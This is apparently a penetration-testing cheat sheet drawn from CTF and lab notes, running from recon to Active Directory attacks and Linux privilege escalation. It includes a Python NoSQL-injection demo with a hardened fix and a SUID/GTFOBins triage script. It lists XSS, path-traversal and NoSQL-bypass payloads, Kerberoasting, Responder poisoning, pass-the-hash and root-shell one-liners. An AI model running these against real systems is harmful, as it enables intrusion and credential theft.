In the fast-paced world of cybersecurity, having a reliable "brain dump" is the difference between a successful engagement and a dead end. These are my personal notes, curated from countless hours of CTFs and labs, structured into a logical workflow.

1. External Recon & Information Gathering

Before touching the target, you need to know what exists.

Google & GitHub Dorking

Search engines are the most underrated hacking tools.

  • Find Exposed API Keys: intitle:"index of" api_key OR "api key" OR apiKey -pool (the -pool term drops the mining-pool listings that otherwise flood this dork).
  • Exposed WordPress Users: inurl:"/wp-json/wp/v2/users"
  • GitHub Sensitive Data (GitHub code search): "nasa.gov" passwd (replace nasa.gov with your target domain).

Subdomain & Asset Discovery

Don't just scan a single IP; find the whole ecosystem.

  • Passive Discovery (amass):
amass enum -passive -d target.com
  • HTTP Probing: Identify which subdomains are actually alive.
cat subs.txt | sort -u | httprobe --prefer-https > live_assets.txt
  • Technology Identification: whatweb -a 1 $IP (Stealthy) or whatweb -a 3 $IP (Aggressive).
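
Before the probing step you usually have three or four tool outputs in different shapes (bare names from amass, wildcards, full URLs from httprobe, stray ports and trailing dots) and at least one host that merely looks in scope. The following is an added example, not part of the original notes: it merges such output into one deduplicated, in-scope list, with the scope check done on a dot boundary so that target.com.evil.io and nottarget.com are rejected. The sample lines are constructed; target.com is a placeholder scope.

```python
import re
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# Hostname sanity check (letters, digits, hyphens; at least two labels).
# Underscore-only DNS names (_dmarc, _sip) are dropped on purpose: not web hosts.
HOST_RE = re.compile(
    r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$"
)


def normalise_host(raw: str) -> Optional[str]:
    """Reduce one line of tool output to a bare, lowercase hostname.

    Handles bare names and "*.x" wildcards (amass), URLs (httprobe/httpx),
    and hand-typed lists with :port or trailing dots. Returns None for
    blank lines, comments and anything that is not a hostname.
    """
    s = raw.strip().lower()
    if not s or s.startswith("#"):
        return None
    if "://" in s:                                   # URL: keep only the host
        s = urlsplit(s).hostname or ""
    else:
        s = s.split("/", 1)[0]                       # drop any path
        if re.search(r":\d+$", s):                   # drop :port
            s = s.rsplit(":", 1)[0]
    if s.startswith("*."):                           # wildcard record -> its parent
        s = s[2:]
    s = s.rstrip(".")
    return s if HOST_RE.match(s) else None


def in_scope(host: str, scope: Iterable[str]) -> bool:
    """Exact match or a sub-domain of a scope domain, checked on a dot boundary."""
    return any(host == d or host.endswith("." + d) for d in scope)


def consolidate(lines: Iterable[str], scope: Iterable[str]) -> List[str]:
    """Merge raw tool output into a sorted, deduplicated, in-scope host list."""
    scope = [d.lower().strip(".") for d in scope]
    hosts = set()
    for line in lines:
        host = normalise_host(line)
        if host and in_scope(host, scope):
            hosts.add(host)
    return sorted(hosts)


# Constructed sample: amass and httprobe output mixed with out-of-scope noise.
SAMPLE_OUTPUT = """
api.target.com
API.Target.com
*.dev.target.com
https://www.target.com/
http://shop.target.com:8080/login
cdn.target.com.
nottarget.com
target.com.evil.io
target.com
# comment line
mail.other.org
"""

if __name__ == "__main__":
    for h in consolidate(SAMPLE_OUTPUT.splitlines(), ["target.com"]):
        print(h)
```

Pipe the result into httprobe or httpx as before; the point of the dot-boundary check is that a plain substring match on "target.com" would have kept both look-alike hosts and put out-of-scope traffic on your engagement record.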

2. Web Vulnerability Research

Once you have a web target, the goal is to find entry points through fuzzing and parameter analysis.

Directory & Parameter Fuzzing

Directory Brute Force (FFUF):

ffuf -w /path/to/wordlist -u https://target/FUZZ

Virtual Host Discovery:

ffuf -w subdomains.txt -u http://target.htb/ -H "Host: FUZZ.target.htb" -fc 302
(Send one request with a bogus Host first and note what the catch-all vhost returns; filter that response with -fc for status or -fs for size so only real vhosts are left.)

Hidden Parameter Mining: Use arjun to find parameters the endpoint still accepts but never documents.

arjun -u https://api.target.com/endpoint -m POST

Common Web Attack Payloads

XSS (Reflected):

<img src=x onerror=alert(document.cookie)>

LFI / Path Traversal:

  • Linux: ../../../../etc/passwd
  • Windows: ..\..\..\windows\win.ini

NoSQL Injection (Bypass Login):

{"username": {"$gt": ""}, "password": {"$gt": ""}}
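
The bypass works because the application hands the parsed JSON straight to the database driver, so the attacker supplies an operator object where a string was expected. As an added example that is not part of the original notes, the block below implements a tiny subset of MongoDB's matching (equality, $gt, $ne, $regex) over a constructed user store, then shows the vulnerable login accepting the page's payload and a hardened login that refuses anything but strings. Passwords are stored in clear only to keep the demo short; the injection point is the same with hashed passwords.

```python
import json
import re
from typing import Any, Dict, List, Optional

# Constructed user store; nothing here is real data.
USERS: List[Dict[str, str]] = [
    {"username": "alice", "password": "correct horse battery"},
    {"username": "admin", "password": "Winter2024!"},
]


def match_value(doc_value: Any, query_value: Any) -> bool:
    """Subset of MongoDB query semantics: plain value = equality, dict = operators."""
    if not isinstance(query_value, dict):
        return doc_value == query_value
    for op, arg in query_value.items():
        if op == "$gt":        # every non-empty string is > "", hence the bypass
            if not (isinstance(doc_value, str) and doc_value > arg):
                return False
        elif op == "$ne":
            if doc_value == arg:
                return False
        elif op == "$regex":   # also lets an attacker brute-force a secret char by char
            if not re.search(arg, str(doc_value)):
                return False
        else:
            raise ValueError(f"operator {op} not modelled here")
    return True


def find_one(query: Dict[str, Any]) -> Optional[Dict[str, str]]:
    for user in USERS:
        if all(match_value(user.get(k), v) for k, v in query.items()):
            return user
    return None


def login_vulnerable(body: str) -> Optional[str]:
    """Feeds the parsed JSON body straight into the query, operators and all."""
    data = json.loads(body)
    user = find_one({"username": data["username"], "password": data["password"]})
    return user["username"] if user else None


def login_hardened(body: str) -> Optional[str]:
    """Only strings may reach the query; an object in either field is rejected."""
    data = json.loads(body)
    username, password = data.get("username"), data.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    user = find_one({"username": username, "password": password})
    return user["username"] if user else None


# Constructed request bodies.
BYPASS_PAYLOAD = '{"username": {"$gt": ""}, "password": {"$gt": ""}}'   # the page's payload
TARGETED_PAYLOAD = '{"username": "admin", "password": {"$ne": ""}}'      # pick the account
REGEX_PAYLOAD = '{"username": "admin", "password": {"$regex": "^W"}}'     # oracle for the secret
LEGIT = '{"username": "alice", "password": "correct horse battery"}'

if __name__ == "__main__":
    for name, body in [("bypass", BYPASS_PAYLOAD), ("targeted", TARGETED_PAYLOAD),
                       ("regex", REGEX_PAYLOAD), ("legit", LEGIT)]:
        print(f"{name:9} vulnerable={login_vulnerable(body)!s:6} hardened={login_hardened(body)}")
```

The $gt payload logs the attacker in as whichever user the driver returns first; the $ne form selects an account by name, and $regex turns the login into a yes/no oracle for the stored value. The type check is the fix: a JSON object can never be a valid username or password.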

3. Active Directory (AD) Domination

In a Windows environment, AD is the "Holy Grail." Here is the path from zero to Domain Admin.

Initial Enumeration (Ports 88 Kerberos, 135 RPC, 445 SMB)

  • Check for Null Sessions: rpcclient -U '' -N $IP (-N sends no password; then run enumdomusers).
  • SMB Share Enumeration (crackmapexec; its maintained fork netexec takes the same syntax as nxc):
cme smb $IP --shares -u 'guest' -p ''
  • RID Cycling: Brute-force RIDs over LSARPC to list every user and group in the domain. Any low-privilege credential will do, and some hosts allow it anonymously.
lookupsid.py domain/user:pass@$IP

Advanced AD Attacks

  • Kerberoasting: Requesting service tickets to crack offline.
GetUserSPNs.py -dc-ip $IP domain/user:pass -request
  • AS-REP Roasting: Targeting users who don't require Kerberos pre-authentication; the AS-REP comes back without proof of the password and is cracked offline.
GetNPUsers.py -dc-ip $IP -no-pass -usersfile users.txt domain/
  • LLMNR/NBT-NS Poisoning: Use Responder to answer broadcast name lookups and capture NetNTLMv2 challenge-responses from the wire (crack them with hashcat -m 5600).
responder -I eth0 -dwP

4. Linux Post-Exploitation & PrivEsc

Once you have a shell, the real work begins.

Stabilization

Never work in a "dumb" shell. Stabilize it immediately:

python3 -c "import pty; pty.spawn('/bin/bash')"
# Then background with Ctrl+Z and run:
stty raw -echo; fg

Finding the Path to Root

  • Check SUID Binaries: Files that execute with their owner's privileges; the root-owned ones are the targets.
find / -perm -u=s -type f 2>/dev/null
  • Capabilities: getcap -r / 2>/dev/null
  • Sudo Rights: sudo -l

Pro Tip: Always cross-reference SUID/Sudo findings with GTFOBins. A SUID or sudo-able perl, python or find is a root shell in one line; a SUID cat only reads files, but reading /etc/shadow or root's SSH key is usually enough.
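
The find one-liner and the GTFOBins lookup are the two halves of one routine, so here they are as one script. This is an added example, not part of the original notes: it walks a tree for setuid regular files the way find -perm -u=s -type f does, swallowing permission errors like 2>/dev/null, and annotates each hit from a small constructed subset of GTFOBins entries (verify against gtfobins.github.io; the real list is longer and changes). self_check() builds a throwaway directory with one setuid file so the walker can be exercised without root.

```python
import os
import stat
import tempfile
from typing import Dict, Iterable, List, Tuple

# Constructed subset of GTFOBins SUID entries: binary -> what it gives you.
GTFOBINS_SUID: Dict[str, str] = {
    "bash": "bash -p",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "perl": "perl -e 'exec \"/bin/sh\";'",
    "python3": "python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
    "cat": "cat /etc/shadow  (file read only, not a shell)",
}


def suid_entries(entries: Iterable[Tuple[str, int]]) -> List[str]:
    """Pure filter over (path, st_mode) pairs: regular files with the setuid bit."""
    return [path for path, mode in entries
            if stat.S_ISREG(mode) and mode & stat.S_ISUID]


def find_suid(root: str) -> List[str]:
    """Python equivalent of: find ROOT -perm -u=s -type f 2>/dev/null"""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                entries.append((path, os.lstat(path).st_mode))   # lstat: never follow symlinks
            except OSError:
                continue                                          # unreadable: same as 2>/dev/null
    return sorted(suid_entries(entries))


def triage(paths: Iterable[str]) -> Dict[str, str]:
    """Cross-reference each SUID path with the GTFOBins subset by basename."""
    return {p: GTFOBINS_SUID.get(os.path.basename(p),
                                 "not in the subset above: check GTFOBins manually")
            for p in paths}


def self_check() -> Tuple[List[str], List[str]]:
    """Build a throwaway tree with one setuid file and walk it.

    Returns (what find_suid reported, files that really carry the setuid bit).
    """
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        wanted = {"perl": 0o4755, "ls": 0o755}      # one setuid file, one plain file
        for name, mode in wanted.items():
            path = os.path.join(bindir, name)
            with open(path, "w"):
                pass
            os.chmod(path, mode)
        truly_suid = sorted(p for p in (os.path.join(bindir, n) for n in wanted)
                            if os.stat(p).st_mode & stat.S_ISUID)
        return find_suid(root), truly_suid


if __name__ == "__main__":
    found, _expected = self_check()
    for path, hint in triage(found).items():
        print(f"{path}: {hint}")
```

On a real box call find_suid("/") and feed the result to triage(); getcap -r and sudo -l still need their own pass, since capabilities and sudo rules are not visible in the mode bits.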

5. Quick Reference Tables

Cracking — Hashcat

hashcat -m 1800 hash.txt rockyou.txt
(-m 1800 is sha512crypt, the $6$ entries in /etc/shadow. Other modes this sheet produces: 1000 NTLM from secretsdump, 13100 Kerberoast TGS-REP, 18200 AS-REP, 5600 NetNTLMv2 from Responder.)

Pass-the-Hash — Psexec

psexec.py domain/user@$IP -hashes :<NT_HASH>
(The value is LM:NT; leaving LM empty before the colon is fine. psexec.py uploads a service binary and creates a service, so on a monitored host prefer wmiexec.py, which drops nothing on disk.)

API Scanning — KiteRunner

kr scan http://api.target -w routes.kite

SQL Injection — SQLMap

sqlmap -r request.req --batch --dbs

Final Thoughts

Pentesting is as much about the quality of your notes as it is about the speed of your typing. This cheat sheet is a living document — keep it updated, keep it organized, and always stay curious.